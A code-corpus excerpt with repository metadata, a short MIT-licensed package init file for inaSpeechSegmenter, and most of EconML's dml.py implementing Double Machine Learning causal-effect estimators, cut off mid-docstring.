] | 2 | 2022-01-27T18:35:32.000Z | 2022-01-28T11:40:26.000Z | inaSpeechSegmenter/__init__.py | vancdk/inaSpeechSegmenter | eb22d8940f86f2917c7b8f6d0fd17c4fc73e2732 | [
"MIT"
] | null | null | null | inaSpeechSegmenter/__init__.py | vancdk/inaSpeechSegmenter | eb22d8940f86f2917c7b8f6d0fd17c4fc73e2732 | [
"MIT"
] | 2 | 2020-06-28T11:12:56.000Z | 2021-08-25T08:30:14.000Z | #!/usr/bin/env python
# encoding: utf-8
# The MIT License
# Copyright (c) 2018 Ina (David Doukhan - http://www.ina.fr/)
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from .segmenter import Segmenter, seg2csv
| 45.148148 | 79 | 0.772765 |
acf6d585f20e64a95cc5e54aaec56fce7a2745e9 | 53,276 | py | Python | econml/dml.py | knightrade/EconML | c918cc037c8e80201105c678f60a2c5ee9105c06 | [
"MIT"
] | 1 | 2020-09-03T08:59:11.000Z | 2020-09-03T08:59:11.000Z | econml/dml.py | knightrade/EconML | c918cc037c8e80201105c678f60a2c5ee9105c06 | [
"MIT"
] | null | null | null | econml/dml.py | knightrade/EconML | c918cc037c8e80201105c678f60a2c5ee9105c06 | [
"MIT"
] | null | null | null | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
"""Double Machine Learning. The method uses machine learning methods to identify the
part of the observed outcome and treatment that is not predictable by the controls X, W
(aka residual outcome and residual treatment).
Then estimates a CATE model by regressing the residual outcome on the residual treatment
in a manner that accounts for heterogeneity in the regression coefficient, with respect
to X.
References
----------
\\ V. Chernozhukov, D. Chetverikov, M. Demirer, E. Duflo, C. Hansen, and a. W. Newey.
Double Machine Learning for Treatment and Causal Parameters.
https://arxiv.org/abs/1608.00060, 2016.
\\ X. Nie and S. Wager.
Quasi-Oracle Estimation of Heterogeneous Treatment Effects.
arXiv preprint arXiv:1712.04912, 2017. URL http://arxiv.org/abs/1712.04912.
\\ V. Chernozhukov, M. Goldman, V. Semenova, and M. Taddy.
Orthogonal Machine Learning for Demand Estimation: High Dimensional Causal Inference in Dynamic Panels.
https://arxiv.org/abs/1712.09988, December 2017.
\\ V. Chernozhukov, D. Nekipelov, V. Semenova, and V. Syrgkanis.
Two-Stage Estimation with a High-Dimensional Second Stage.
https://arxiv.org/abs/1806.04823, 2018.
\\ Dylan Foster, Vasilis Syrgkanis (2019).
Orthogonal Statistical Learning.
ACM Conference on Learning Theory. https://arxiv.org/abs/1901.09036
"""
import numpy as np
import copy
from warnings import warn
from .utilities import (shape, reshape, ndim, hstack, cross_product, transpose, inverse_onehot,
broadcast_unit_treatments, reshape_treatmentwise_effects, add_intercept,
StatsModelsLinearRegression, LassoCVWrapper, check_high_dimensional)
from econml.sklearn_extensions.linear_model import MultiOutputDebiasedLasso, WeightedLassoCVWrapper
from econml.sklearn_extensions.ensemble import SubsampledHonestForest
from sklearn.model_selection import KFold, StratifiedKFold, check_cv
from sklearn.linear_model import LinearRegression, LassoCV, LogisticRegressionCV, ElasticNetCV
from sklearn.preprocessing import (PolynomialFeatures, LabelEncoder, OneHotEncoder,
FunctionTransformer)
from sklearn.base import clone, TransformerMixin
from sklearn.pipeline import Pipeline
from sklearn.utils import check_random_state
from .cate_estimator import (BaseCateEstimator, LinearCateEstimator,
TreatmentExpansionMixin, StatsModelsCateEstimatorMixin,
DebiasedLassoCateEstimatorMixin)
from .inference import StatsModelsInference, GenericSingleTreatmentModelFinalInference
from ._rlearner import _RLearner
from .sklearn_extensions.model_selection import WeightedStratifiedKFold
class _FirstStageWrapper:
def __init__(self, model, is_Y, featurizer, linear_first_stages, discrete_treatment):
self._model = clone(model, safe=False)
self._featurizer = clone(featurizer, safe=False)
self._is_Y = is_Y
self._linear_first_stages = linear_first_stages
self._discrete_treatment = discrete_treatment
def _combine(self, X, W, n_samples, fitting=True):
if X is None:
# if both X and W are None, just return a column of ones
return (W if W is not None else np.ones((n_samples, 1)))
XW = hstack([X, W]) if W is not None else X
if self._is_Y and self._linear_first_stages:
if self._featurizer is None:
F = X
else:
F = self._featurizer.fit_transform(X) if fitting else self._featurizer.transform(X)
return cross_product(XW, hstack([np.ones((shape(XW)[0], 1)), F]))
else:
return XW
def fit(self, X, W, Target, sample_weight=None):
if (not self._is_Y) and self._discrete_treatment:
# In this case, the Target is the one-hot-encoding of the treatment variable
# We need to go back to the label representation of the one-hot so as to call
# the classifier.
if np.any(np.all(Target == 0, axis=0)) or (not np.any(np.all(Target == 0, axis=1))):
raise AttributeError("Provided crossfit folds contain training splits that " +
"don't contain all treatments")
Target = inverse_onehot(Target)
if sample_weight is not None:
self._model.fit(self._combine(X, W, Target.shape[0]), Target, sample_weight=sample_weight)
else:
self._model.fit(self._combine(X, W, Target.shape[0]), Target)
def predict(self, X, W):
n_samples = X.shape[0] if X is not None else (W.shape[0] if W is not None else 1)
if (not self._is_Y) and self._discrete_treatment:
return self._model.predict_proba(self._combine(X, W, n_samples, fitting=False))[:, 1:]
else:
return self._model.predict(self._combine(X, W, n_samples, fitting=False))
def score(self, X, W, Target, sample_weight=None):
if hasattr(self._model, 'score'):
if (not self._is_Y) and self._discrete_treatment:
# In this case, the Target is the one-hot-encoding of the treatment variable
# We need to go back to the label representation of the one-hot so as to call
# the classifier.
Target = inverse_onehot(Target)
if sample_weight is not None:
return self._model.score(self._combine(X, W, Target.shape[0]), Target, sample_weight=sample_weight)
else:
return self._model.score(self._combine(X, W, Target.shape[0]), Target)
else:
return None
class _FinalWrapper:
def __init__(self, model_final, fit_cate_intercept, featurizer, use_weight_trick):
self._model = clone(model_final, safe=False)
self._use_weight_trick = use_weight_trick
self._original_featurizer = clone(featurizer, safe=False)
if self._use_weight_trick:
self._fit_cate_intercept = False
self._featurizer = self._original_featurizer
else:
self._fit_cate_intercept = fit_cate_intercept
if self._fit_cate_intercept:
add_intercept_trans = FunctionTransformer(add_intercept,
validate=True)
if featurizer:
self._featurizer = Pipeline([('featurize', self._original_featurizer),
('add_intercept', add_intercept_trans)])
else:
self._featurizer = add_intercept_trans
else:
self._featurizer = self._original_featurizer
def _combine(self, X, T, fitting=True):
if X is not None:
if self._featurizer is not None:
F = self._featurizer.fit_transform(X) if fitting else self._featurizer.transform(X)
else:
F = X
else:
if not self._fit_cate_intercept:
if self._use_weight_trick:
raise AttributeError("Cannot use this method with X=None. Consider "
"using the LinearDMLCateEstimator.")
else:
raise AttributeError("Cannot have X=None and also not allow for a CATE intercept!")
F = np.ones((T.shape[0], 1))
return cross_product(F, T)
def fit(self, X, T_res, Y_res, sample_weight=None, sample_var=None):
# Track training dimensions to see if Y or T is a vector instead of a 2-dimensional array
self._d_t = shape(T_res)[1:]
self._d_y = shape(Y_res)[1:]
if not self._use_weight_trick:
fts = self._combine(X, T_res)
if sample_weight is not None:
if sample_var is not None:
self._model.fit(fts,
Y_res, sample_weight=sample_weight, sample_var=sample_var)
else:
self._model.fit(fts,
Y_res, sample_weight=sample_weight)
else:
self._model.fit(fts, Y_res)
self._intercept = None
intercept = self._model.predict(np.zeros_like(fts[0:1]))
if (np.count_nonzero(intercept) > 0):
warn("The final model has a nonzero intercept for at least one outcome; "
"it will be subtracted, but consider fitting a model without an intercept if possible.",
UserWarning)
self._intercept = intercept
elif not self._fit_cate_intercept:
if (np.ndim(T_res) > 1) and (self._d_t[0] > 1):
raise AttributeError("This method can only be used with single-dimensional continuous treatment "
"or binary categorical treatment.")
F = self._combine(X, np.ones(T_res.shape[0]))
self._intercept = None
T_res = T_res.ravel()
sign_T_res = np.sign(T_res)
sign_T_res[(sign_T_res < 1) & (sign_T_res > -1)] = 1
clipped_T_res = sign_T_res * np.clip(np.abs(T_res), 1e-5, np.inf)
if np.ndim(Y_res) > 1:
clipped_T_res = clipped_T_res.reshape(-1, 1)
target = Y_res / clipped_T_res
target_var = sample_var / clipped_T_res**2 if sample_var is not None else None
if sample_weight is not None:
if target_var is not None:
self._model.fit(F, target, sample_weight=sample_weight * T_res.flatten()**2,
sample_var=target_var)
else:
self._model.fit(F, target, sample_weight=sample_weight * T_res.flatten()**2)
else:
self._model.fit(F, target, sample_weight=T_res.flatten()**2)
else:
raise AttributeError("This combination is not a feasible one!")
def predict(self, X):
X2, T = broadcast_unit_treatments(X if X is not None else np.empty((1, 0)),
self._d_t[0] if self._d_t else 1)
# This works both with our without the weighting trick as the treatments T are unit vector
# treatments. And in the case of a weighting trick we also know that treatment is single-dimensional
prediction = self._model.predict(self._combine(None if X is None else X2, T, fitting=False))
if self._intercept is not None:
prediction -= self._intercept
return reshape_treatmentwise_effects(prediction,
self._d_t, self._d_y)
class _BaseDMLCateEstimator(_RLearner):
# A helper class that access all the internal fitted objects of a DML Cate Estimator. Used by
# both Parametric and Non Parametric DML.
@property
def original_featurizer(self):
return super().model_final._original_featurizer
@property
def featurizer(self):
# NOTE This is used by the inference methods and has to be the overall featurizer. intended
# for internal use by the library
return super().model_final._featurizer
@property
def model_final(self):
# NOTE This is used by the inference methods and is more for internal use to the library
return super().model_final._model
@property
def model_cate(self):
"""
Get the fitted final CATE model.
Returns
-------
model_cate: object of type(model_final)
An instance of the model_final object that was fitted after calling fit which corresponds
to the constant marginal CATE model.
"""
return super().model_final._model
@property
def models_y(self):
"""
Get the fitted models for E[Y | X, W].
Returns
-------
models_y: list of objects of type(`model_y`)
A list of instances of the `model_y` object. Each element corresponds to a crossfitting
fold and is the model instance that was fitted for that training fold.
"""
return [mdl._model for mdl in super().models_y]
@property
def models_t(self):
"""
Get the fitted models for E[T | X, W].
Returns
-------
models_y: list of objects of type(`model_t`)
A list of instances of the `model_y` object. Each element corresponds to a crossfitting
fold and is the model instance that was fitted for that training fold.
"""
return [mdl._model for mdl in super().models_t]
def cate_feature_names(self, input_feature_names=None):
"""
Get the output feature names.
Parameters
----------
input_feature_names: list of strings of length X.shape[1] or None
The names of the input features
Returns
-------
out_feature_names: list of strings or None
The names of the output features :math:`\\phi(X)`, i.e. the features with respect to which the
final constant marginal CATE model is linear. It is the names of the features that are associated
with each entry of the :meth:`coef_` parameter. Not available when the featurizer is not None and
does not have a method: `get_feature_names(input_feature_names)`. Otherwise None is returned.
"""
if self.original_featurizer is None:
return input_feature_names
elif hasattr(self.original_featurizer, 'get_feature_names'):
return self.original_featurizer.get_feature_names(input_feature_names)
else:
raise AttributeError("Featurizer does not have a method: get_feature_names!")
class DMLCateEstimator(_BaseDMLCateEstimator):
"""
The base class for parametric Double ML estimators. The estimator is a special
case of an :class:`._RLearner` estimator, which in turn is a special case
of an :class:`_OrthoLearner` estimator, so it follows the two
stage process, where a set of nuisance functions are estimated in the first stage in a crossfitting
manner and a final stage estimates the CATE model. See the documentation of
:class:`._OrthoLearner` for a description of this two stage process.
In this estimator, the CATE is estimated by using the following estimating equations:
.. math ::
Y - \\E[Y | X, W] = \\Theta(X) \\cdot (T - \\E[T | X, W]) + \\epsilon
Thus if we estimate the nuisance functions :math:`q(X, W) = \\E[Y | X, W]` and
:math:`f(X, W)=\\E[T | X, W]` in the first stage, we can estimate the final stage cate for each
treatment t, by running a regression, minimizing the residual on residual square loss:
.. math ::
\\hat{\\theta} = \\arg\\min_{\\Theta}\
\\E_n\\left[ (\\tilde{Y} - \\Theta(X) \\cdot \\tilde{T})^2 \\right]
Where :math:`\\tilde{Y}=Y - \\E[Y | X, W]` and :math:`\\tilde{T}=T-\\E[T | X, W]` denotes the
residual outcome and residual treatment.
The DMLCateEstimator further assumes a linear parametric form for the cate, i.e. for each outcome
:math:`i` and treatment :math:`j`:
.. math ::
\\Theta_{i, j}(X) = \\phi(X)' \\cdot \\Theta_{ij}
For some given feature mapping :math:`\\phi(X)` (the user can provide this featurizer via the `featurizer`
parameter at init time and could be any arbitrary class that adheres to the scikit-learn transformer
interface :class:`~sklearn.base.TransformerMixin`).
The second nuisance function :math:`q` is a simple regression problem and the
:class:`.DMLCateEstimator`
class takes as input the parameter `model_y`, which is an arbitrary scikit-learn regressor that
is internally used to solve this regression problem.
The problem of estimating the nuisance function :math:`f` is also a regression problem and
the :class:`.DMLCateEstimator`
class takes as input the parameter `model_t`, which is an arbitrary scikit-learn regressor that
is internally used to solve this regression problem. If the init flag `discrete_treatment` is set
to `True`, then the parameter `model_t` is treated as a scikit-learn classifier. The input categorical
treatment is one-hot encoded (excluding the lexicographically smallest treatment which is used as the
baseline) and the `predict_proba` method of the `model_t` classifier is used to
residualize the one-hot encoded treatment.
The final stage is (potentially multi-task) linear regression problem with outcomes the labels
:math:`\\tilde{Y}` and regressors the composite features
:math:`\\tilde{T}\\otimes \\phi(X) = \\mathtt{vec}(\\tilde{T}\\cdot \\phi(X)^T)`.
The :class:`.DMLCateEstimator` takes as input parameter
``model_final``, which is any linear scikit-learn regressor that is internally used to solve this
(multi-task) linear regresion problem.
Parameters
----------
model_y: estimator
The estimator for fitting the response to the features. Must implement
`fit` and `predict` methods. Must be a linear model for correctness when linear_first_stages is ``True``.
model_t: estimator or 'auto' (default is 'auto')
The estimator for fitting the treatment to the features.
If estimator, it must implement `fit` and `predict` methods. Must be a linear model for correctness
when linear_first_stages is ``True``;
If 'auto', :class:`~sklearn.linear_model.LogisticRegressionCV`
will be applied for discrete treatment,
and :class:`.WeightedLassoCV`/
:class:`.WeightedMultiTaskLassoCV`
will be applied for continuous treatment.
model_final: estimator
The estimator for fitting the response residuals to the treatment residuals. Must implement
`fit` and `predict` methods, and must be a linear model for correctness.
featurizer: :term:`transformer`, optional, default None
Must support fit_transform and transform. Used to create composite features in the final CATE regression.
It is ignored if X is None. The final CATE will be trained on the outcome of featurizer.fit_transform(X).
If featurizer=None, then CATE is trained on X.
fit_cate_intercept : bool, optional, default True
Whether the linear CATE model should have a constant term.
linear_first_stages: bool
Whether the first stage models are linear (in which case we will expand the features passed to
`model_y` accordingly)
discrete_treatment: bool, optional, default False
Whether the treatment values should be treated as categorical, rather than continuous, quantities
categories: 'auto' or list, default 'auto'
The categories to use when encoding discrete treatments (or 'auto' to use the unique sorted values).
The first category will be treated as the control treatment.
n_splits: int, cross-validation generator or an iterable, optional, default 2
Determines the cross-validation splitting strategy.
Possible inputs for cv are:
- None, to use the default 3-fold cross-validation,
- integer, to specify the number of folds.
- :term:`cv splitter`
- An iterable yielding (train, test) splits as arrays of indices.
For integer/None inputs, if the treatment is discrete
:class:`~sklearn.model_selection.StratifiedKFold` is used, else,
:class:`~sklearn.model_selection.KFold` is used
(with a random shuffle in either case).
Unless an iterable is used, we call `split(concat[W, X], T)` to generate the splits. If all
W, X are None, then we call `split(ones((T.shape[0], 1)), T)`.
random_state: int, :class:`~numpy.random.mtrand.RandomState` instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If :class:`~numpy.random.mtrand.RandomState` instance, random_state is the random number generator;
If None, the random number generator is the :class:`~numpy.random.mtrand.RandomState` instance used
by :mod:`np.random<numpy.random>`.
"""
def __init__(self,
model_y, model_t, model_final,
featurizer=None,
fit_cate_intercept=True,
linear_first_stages=False,
discrete_treatment=False,
categories='auto',
n_splits=2,
random_state=None):
# TODO: consider whether we need more care around stateful featurizers,
# since we clone it and fit separate copies
if model_t == 'auto':
if discrete_treatment:
model_t = LogisticRegressionCV(cv=WeightedStratifiedKFold())
else:
model_t = WeightedLassoCVWrapper()
self.bias_part_of_coef = fit_cate_intercept
self.fit_cate_intercept = fit_cate_intercept
super().__init__(model_y=_FirstStageWrapper(model_y, True,
featurizer, linear_first_stages, discrete_treatment),
model_t=_FirstStageWrapper(model_t, False,
featurizer, linear_first_stages, discrete_treatment),
model_final=_FinalWrapper(model_final, fit_cate_intercept, featurizer, False),
discrete_treatment=discrete_treatment,
categories=categories,
n_splits=n_splits,
random_state=random_state)
class LinearDMLCateEstimator(StatsModelsCateEstimatorMixin, DMLCateEstimator):
"""
The Double ML Estimator with a low-dimensional linear final stage implemented as a statsmodel regression.
Parameters
----------
model_y: estimator, optional (default is :class:`.WeightedLassoCVWrapper`)
The estimator for fitting the response to the features. Must implement
`fit` and `predict` methods.
model_t: estimator or 'auto', optional (default is 'auto')
The estimator for fitting the treatment to the features.
If estimator, it must implement `fit` and `predict` methods;
If 'auto', :class:`~sklearn.linear_model.LogisticRegressionCV` will be applied for discrete treatment,
and :class:`.WeightedLassoCV`/:class:`.WeightedMultiTaskLassoCV`
will be applied for continuous treatment.
featurizer : :term:`transformer`, optional, default None
Must support fit_transform and transform. Used to create composite features in the final CATE regression.
It is ignored if X is None. The final CATE will be trained on the outcome of featurizer.fit_transform(X).
If featurizer=None, then CATE is trained on X.
fit_cate_intercept : bool, optional, default True
Whether the linear CATE model should have a constant term.
linear_first_stages: bool
Whether the first stage models are linear (in which case we will expand the features passed to
`model_y` accordingly)
discrete_treatment: bool, optional (default is ``False``)
Whether the treatment values should be treated as categorical, rather than continuous, quantities
categories: 'auto' or list, default 'auto'
The categories to use when encoding discrete treatments (or 'auto' to use the unique sorted values).
The first category will be treated as the control treatment.
n_splits: int, cross-validation generator or an iterable, optional (Default=2)
Determines the cross-validation splitting strategy.
Possible inputs for cv are:
- None, to use the default 3-fold cross-validation,
- integer, to specify the number of folds.
- :term:`cv splitter`
- An iterable yielding (train, test) splits as arrays of indices.
For integer/None inputs, if the treatment is discrete
:class:`~sklearn.model_selection.StratifiedKFold` is used, else,
:class:`~sklearn.model_selection.KFold` is used
(with a random shuffle in either case).
Unless an iterable is used, we call `split(X,T)` to generate the splits.
random_state: int, :class:`~numpy.random.mtrand.RandomState` instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If :class:`~numpy.random.mtrand.RandomState` instance, random_state is the random number generator;
If None, the random number generator is the :class:`~numpy.random.mtrand.RandomState` instance used
by :mod:`np.random<numpy.random>`.
"""
def __init__(self,
model_y=WeightedLassoCVWrapper(), model_t='auto',
featurizer=None,
fit_cate_intercept=True,
linear_first_stages=True,
discrete_treatment=False,
categories='auto',
n_splits=2,
random_state=None):
super().__init__(model_y=model_y,
model_t=model_t,
model_final=StatsModelsLinearRegression(fit_intercept=False),
featurizer=featurizer,
fit_cate_intercept=fit_cate_intercept,
linear_first_stages=linear_first_stages,
discrete_treatment=discrete_treatment,
categories=categories,
n_splits=n_splits,
random_state=random_state)
# override only so that we can update the docstring to indicate support for `StatsModelsInference`
def fit(self, Y, T, X=None, W=None, sample_weight=None, sample_var=None, inference=None):
"""
Estimate the counterfactual model from data, i.e. estimates functions τ(·,·,·), ∂τ(·,·).
Parameters
----------
Y: (n × d_y) matrix or vector of length n
Outcomes for each sample
T: (n × dₜ) matrix or vector of length n
Treatments for each sample
X: optional (n × dₓ) matrix
Features for each sample
W: optional (n × d_w) matrix
Controls for each sample
sample_weight: optional (n,) vector
Weights for each row
inference: string, :class:`.Inference` instance, or None
Method for performing inference. This estimator supports 'bootstrap'
(or an instance of :class:`.BootstrapInference`) and 'statsmodels'
(or an instance of :class:`.StatsModelsInference`)
Returns
-------
self
"""
return super().fit(Y, T, X=X, W=W, sample_weight=sample_weight, sample_var=sample_var, inference=inference)
class SparseLinearDMLCateEstimator(DebiasedLassoCateEstimatorMixin, DMLCateEstimator):
"""
A specialized version of the Double ML estimator for the sparse linear case.
This estimator should be used when the features of heterogeneity are high-dimensional
and the coefficients of the linear CATE function are sparse.
The last stage is an instance of the
:class:`.MultiOutputDebiasedLasso`
Parameters
----------
model_y: estimator, optional (default is :class:`WeightedLassoCVWrapper()
<econml.sklearn_extensions.linear_model.WeightedLassoCVWrapper>`)
The estimator for fitting the response to the features. Must implement
`fit` and `predict` methods.
model_t: estimator or 'auto', optional (default is 'auto')
The estimator for fitting the treatment to the features.
If estimator, it must implement `fit` and `predict` methods, and must be a
linear model for correctness;
If 'auto', :class:`~sklearn.linear_model.LogisticRegressionCV`
will be applied for discrete treatment,
and :class:`.WeightedLassoCV`/
:class:`.WeightedMultiTaskLassoCV`
will be applied for continuous treatment.
alpha: string | float, optional. Default='auto'.
CATE L1 regularization applied through the debiased lasso in the final model.
'auto' corresponds to a CV form of the :class:`MultiOutputDebiasedLasso`.
max_iter : int, optional, default=1000
The maximum number of iterations in the Debiased Lasso
tol : float, optional, default=1e-4
The tolerance for the optimization: if the updates are
smaller than ``tol``, the optimization code checks the
dual gap for optimality and continues until it is smaller
than ``tol``.
featurizer : :term:`transformer`, optional, default None
Must support fit_transform and transform. Used to create composite features in the final CATE regression.
It is ignored if X is None. The final CATE will be trained on the outcome of featurizer.fit_transform(X).
If featurizer=None, then CATE is trained on X.
fit_cate_intercept : bool, optional, default True
Whether the linear CATE model should have a constant term.
linear_first_stages: bool
Whether the first stage models are linear (in which case we will expand the features passed to
`model_y` accordingly)
discrete_treatment: bool, optional (default is ``False``)
Whether the treatment values should be treated as categorical, rather than continuous, quantities
categories: 'auto' or list, default 'auto'
The categories to use when encoding discrete treatments (or 'auto' to use the unique sorted values).
The first category will be treated as the control treatment.
n_splits: int, cross-validation generator or an iterable, optional (Default=2)
Determines the cross-validation splitting strategy.
Possible inputs for cv are:
- None, to use the default 3-fold cross-validation,
- integer, to specify the number of folds.
- :term:`cv splitter`
- An iterable yielding (train, test) splits as arrays of indices.
For integer/None inputs, if the treatment is discrete
:class:`~sklearn.model_selection.StratifiedKFold` is used, else,
:class:`~sklearn.model_selection.KFold` is used
(with a random shuffle in either case).
Unless an iterable is used, we call `split(X,T)` to generate the splits.
random_state: int, :class:`~numpy.random.mtrand.RandomState` instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If :class:`~numpy.random.mtrand.RandomState` instance, random_state is the random number generator;
If None, the random number generator is the :class:`~numpy.random.mtrand.RandomState` instance used
by :mod:`np.random<numpy.random>`.
"""
def __init__(self,
model_y=WeightedLassoCVWrapper(), model_t='auto',
alpha='auto',
max_iter=1000,
tol=1e-4,
featurizer=None,
fit_cate_intercept=True,
linear_first_stages=True,
discrete_treatment=False,
categories='auto',
n_splits=2,
random_state=None):
model_final = MultiOutputDebiasedLasso(
alpha=alpha,
fit_intercept=False,
max_iter=max_iter,
tol=tol)
super().__init__(model_y=model_y,
model_t=model_t,
model_final=model_final,
featurizer=featurizer,
fit_cate_intercept=fit_cate_intercept,
linear_first_stages=linear_first_stages,
discrete_treatment=discrete_treatment,
categories=categories,
n_splits=n_splits,
random_state=random_state)
def fit(self, Y, T, X=None, W=None, sample_weight=None, sample_var=None, inference=None):
"""
Estimate the counterfactual model from data, i.e. estimates functions τ(·,·,·), ∂τ(·,·).
Parameters
----------
Y: (n × d_y) matrix or vector of length n
Outcomes for each sample
T: (n × dₜ) matrix or vector of length n
Treatments for each sample
X: optional (n × dₓ) matrix
Features for each sample
W: optional (n × d_w) matrix
Controls for each sample
sample_weight: optional (n,) vector
Weights for each row
sample_var: optional (n, n_y) vector
Variance of sample, in case it corresponds to summary of many samples. Currently
not in use by this method but will be supported in a future release.
inference: string, `Inference` instance, or None
Method for performing inference. This estimator supports 'bootstrap'
(or an instance of :class:`.BootstrapInference`) and 'debiasedlasso'
(or an instance of :class:`.LinearModelFinalInference`)
Returns
-------
self
"""
# TODO: support sample_var
if sample_var is not None and inference is not None:
warn("This estimator does not yet support sample variances and inference does not take "
"sample variances into account. This feature will be supported in a future release.")
check_high_dimensional(X, T, threshold=5, featurizer=self.featurizer,
discrete_treatment=self._discrete_treatment,
msg="The number of features in the final model (< 5) is too small for a sparse model. "
"We recommend using the LinearDMLCateEstimator for this low-dimensional setting.")
return super().fit(Y, T, X=X, W=W, sample_weight=sample_weight, sample_var=None, inference=inference)
class _RandomFeatures(TransformerMixin):
def __init__(self, dim, bw, random_state):
self._dim = dim
self._bw = bw
self._random_state = check_random_state(random_state)
def fit(self, X):
self.omegas = self._random_state.normal(0, 1 / self._bw, size=(shape(X)[1], self._dim))
self.biases = self._random_state.uniform(0, 2 * np.pi, size=(1, self._dim))
return self
def transform(self, X):
return np.sqrt(2 / self._dim) * np.cos(np.matmul(X, self.omegas) + self.biases)
class KernelDMLCateEstimator(DMLCateEstimator):
"""
A specialized version of the linear Double ML Estimator that uses random fourier features.
Parameters
----------
model_y: estimator, optional (default is :class:`<econml.sklearn_extensions.linear_model.WeightedLassoCVWrapper>`)
The estimator for fitting the response to the features. Must implement
`fit` and `predict` methods.
model_t: estimator or 'auto', optional (default is 'auto')
The estimator for fitting the treatment to the features.
If estimator, it must implement `fit` and `predict` methods;
If 'auto', :class:`~sklearn.linear_model.LogisticRegressionCV`
will be applied for discrete treatment,
and :class:`.WeightedLassoCV`/
:class:`.WeightedMultiTaskLassoCV`
will be applied for continuous treatment.
fit_cate_intercept : bool, optional, default True
Whether the linear CATE model should have a constant term.
dim: int, optional (default is 20)
The number of random Fourier features to generate
bw: float, optional (default is 1.0)
The bandwidth of the Gaussian used to generate features
discrete_treatment: bool, optional (default is ``False``)
Whether the treatment values should be treated as categorical, rather than continuous, quantities
categories: 'auto' or list, default 'auto'
The categories to use when encoding discrete treatments (or 'auto' to use the unique sorted values).
The first category will be treated as the control treatment.
n_splits: int, cross-validation generator or an iterable, optional (Default=2)
Determines the cross-validation splitting strategy.
Possible inputs for cv are:
- None, to use the default 3-fold cross-validation,
- integer, to specify the number of folds.
- :term:`cv splitter`
- An iterable yielding (train, test) splits as arrays of indices.
For integer/None inputs, if the treatment is discrete
:class:`~sklearn.model_selection.StratifiedKFold` is used, else,
:class:`~sklearn.model_selection.KFold` is used
(with a random shuffle in either case).
Unless an iterable is used, we call `split(X,T)` to generate the splits.
random_state: int, :class:`~numpy.random.mtrand.RandomState` instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If :class:`~numpy.random.mtrand.RandomState` instance, random_state is the random number generator;
If None, the random number generator is the :class:`~numpy.random.mtrand.RandomState` instance used
by :mod:`np.random<numpy.random>`.
"""
def __init__(self, model_y=WeightedLassoCVWrapper(), model_t='auto', fit_cate_intercept=True,
dim=20, bw=1.0, discrete_treatment=False, categories='auto', n_splits=2, random_state=None):
super().__init__(model_y=model_y, model_t=model_t,
model_final=ElasticNetCV(fit_intercept=False),
featurizer=_RandomFeatures(dim, bw, random_state),
fit_cate_intercept=fit_cate_intercept,
discrete_treatment=discrete_treatment,
categories=categories,
n_splits=n_splits, random_state=random_state)
class NonParamDMLCateEstimator(_BaseDMLCateEstimator):
"""
The base class for non-parametric Double ML estimators, that can have arbitrary final ML models of the CATE.
Works only for single-dimensional continuous treatment or for binary categorical treatment and uses
the re-weighting trick, reducing the final CATE estimation to a weighted square loss minimization.
The model_final parameter must support the sample_weight keyword argument at fit time.
Parameters
----------
model_y: estimator
The estimator for fitting the response to the features. Must implement
`fit` and `predict` methods. Must be a linear model for correctness when linear_first_stages is ``True``.
model_t: estimator
The estimator for fitting the treatment to the features. Must implement
`fit` and `predict` methods. Must be a linear model for correctness when linear_first_stages is ``True``.
model_final: estimator
The estimator for fitting the response residuals to the treatment residuals. Must implement
`fit` and `predict` methods. It can be an arbitrary scikit-learn regressor. The `fit` method
must accept `sample_weight` as a keyword argument.
featurizer: transformer
The transformer used to featurize the raw features when fitting the final model. Must implement
a `fit_transform` method.
discrete_treatment: bool, optional (default is ``False``)
Whether the treatment values should be treated as categorical, rather than continuous, quantities
categories: 'auto' or list, default 'auto'
The categories to use when encoding discrete treatments (or 'auto' to use the unique sorted values).
The first category will be treated as the control treatment.
n_splits: int, cross-validation generator or an iterable, optional (Default=2)
Determines the cross-validation splitting strategy.
Possible inputs for cv are:
- None, to use the default 3-fold cross-validation,
- integer, to specify the number of folds.
- :term:`cv splitter`
- An iterable yielding (train, test) splits as arrays of indices.
For integer/None inputs, if the treatment is discrete
:class:`~sklearn.model_selection.StratifiedKFold` is used, else,
:class:`~sklearn.model_selection.KFold` is used
(with a random shuffle in either case).
Unless an iterable is used, we call `split(concat[W, X], T)` to generate the splits. If all
W, X are None, then we call `split(ones((T.shape[0], 1)), T)`.
random_state: int, :class:`~numpy.random.mtrand.RandomState` instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If :class:`~numpy.random.mtrand.RandomState` instance, random_state is the random number generator;
If None, the random number generator is the :class:`~numpy.random.mtrand.RandomState` instance used
by :mod:`np.random<numpy.random>`.
"""
def __init__(self,
model_y, model_t, model_final,
featurizer=None,
discrete_treatment=False,
categories='auto',
n_splits=2,
random_state=None):
# TODO: consider whether we need more care around stateful featurizers,
# since we clone it and fit separate copies
super().__init__(model_y=_FirstStageWrapper(model_y, True,
featurizer, False, discrete_treatment),
model_t=_FirstStageWrapper(model_t, False,
featurizer, False, discrete_treatment),
model_final=_FinalWrapper(model_final, False, featurizer, True),
discrete_treatment=discrete_treatment,
categories=categories,
n_splits=n_splits,
random_state=random_state)
class ForestDMLCateEstimator(NonParamDMLCateEstimator):
""" Instance of NonParamDMLCateEstimator with a
:class:`~econml.sklearn_extensions.ensemble.SubsampledHonestForest`
as a final model, so as to enable non-parametric inference.
Parameters
----------
model_y: estimator
